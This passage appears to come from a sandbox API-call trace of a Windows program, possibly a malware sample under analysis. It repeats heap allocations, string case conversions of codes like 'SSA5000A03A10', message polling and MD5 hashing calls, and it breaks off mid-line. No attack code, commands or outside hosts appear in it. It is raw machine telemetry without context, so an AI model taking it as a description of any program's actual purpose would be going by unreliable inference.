0 [0206.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.451] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0206.451] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.452] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.452] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.452] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.452] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0206.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.452] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.452] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.452] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.453] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.453] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.453] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.453] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.453] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.453] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.453] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0206.453] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0206.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.454] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.454] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.454] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.454] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.454] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.454] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.454] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.455] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.455] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.455] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.455] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.455] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.455] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.455] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.456] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.456] CryptCreateHash (in: hProv=0xad2940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.456] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0206.457] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.457] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.457] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.457] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.457] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.458] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0206.458] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0206.459] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.459] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.459] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.459] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.459] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.460] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.460] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.460] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0206.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0206.460] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0206.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0206.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.460] CryptHashData (hHash=0xaa5860, pbData=0x24b17a8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0206.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0206.460] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0206.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0206.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0206.461] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.461] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0206.462] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.462] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0206.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0206.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0206.462] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.463] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.463] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.463] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.463] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.463] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.463] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.463] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.463] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0206.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0206.464] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.464] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.464] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0206.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0206.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.464] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 